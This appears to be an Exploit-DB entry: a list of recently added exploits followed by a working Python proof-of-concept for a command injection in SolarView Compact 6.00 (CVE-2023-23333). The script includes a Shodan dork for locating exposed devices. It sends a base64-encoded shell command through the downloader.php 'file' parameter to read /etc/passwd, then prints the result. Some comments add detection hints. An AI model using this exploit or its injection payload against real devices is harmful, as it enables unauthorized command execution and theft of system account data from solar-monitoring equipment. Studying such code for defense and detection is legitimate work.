
10 changes to exploits/shellcodes/ghdb Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) SolarView Compact 6.00 - Command Injection Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE) GitLab CE/EE < 16.7.2 - Password Reset JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow KiTTY 0.76.1.13 - Command Injection
#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333
import argparse
import requests
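def vuln_check(ip_address, port):
    """Probe a SolarView Compact device for CVE-2023-23333 and print the result.

    Sends a single GET request to ``downloader.php`` whose ``file`` parameter
    carries a shell command, then looks for the string ``root`` in the reply
    body as evidence that the command was executed.

    Args:
        ip_address: Host or IP address of the device to test.
        port: TCP port of the device's HTTP interface.

    Returns:
        None. The outcome is reported on stdout only.
    """
    # The base64 blob decodes to ``cat /etc/passwd``. For detection, the same
    # shape is visible in web-server logs: a request to downloader.php whose
    # ``file`` value contains ``;`` / ``|`` and ends in ``%00.zip``.
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"

    try:
        # Bound the wait so an unresponsive host cannot hang the check forever.
        response = requests.get(url, timeout=10)
    except requests.RequestException:
        # Connection refused, DNS failure, timeout, etc. are reported the same
        # way as a non-200 reply instead of ending in an unhandled traceback.
        print("Error: Unable to fetch response.")
        return

    if response.status_code != 200:
        print("Error: Unable to fetch response.")
        return

    output = response.text
    # NOTE(review): a bare "root" match is a weak signal. Any 200 page that
    # happens to contain the word is reported as vulnerable, so confirm a
    # positive result by inspecting the printed body.
    if "root" in output:
        print("Vulnerability detected: Command Injection possible.")
        # The body printed here is the device's account file; treat the
        # console output (and any log that captures it) as sensitive.
        print(f"passwd file content:\n{response.text}")
    else:
        print("No vulnerability detected.")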
def main():
    """Read the target host and port from the command line and run the check.

    ``--ip`` is mandatory; ``--port`` is parsed as an integer and falls back
    to 80 when omitted. Both values are handed straight to ``vuln_check``.
    """
    cli = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
    cli.add_argument(
        "-i",
        "--ip",
        required=True,
        help="IP address of the target device",
    )
    cli.add_argument(
        "-p",
        "--port",
        type=int,
        default=80,
        help="Port of the the target device (default: 80)",
    )
    options = cli.parse_args()

    vuln_check(options.ip, options.port)
# Script entry point: run the CLI only when this file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()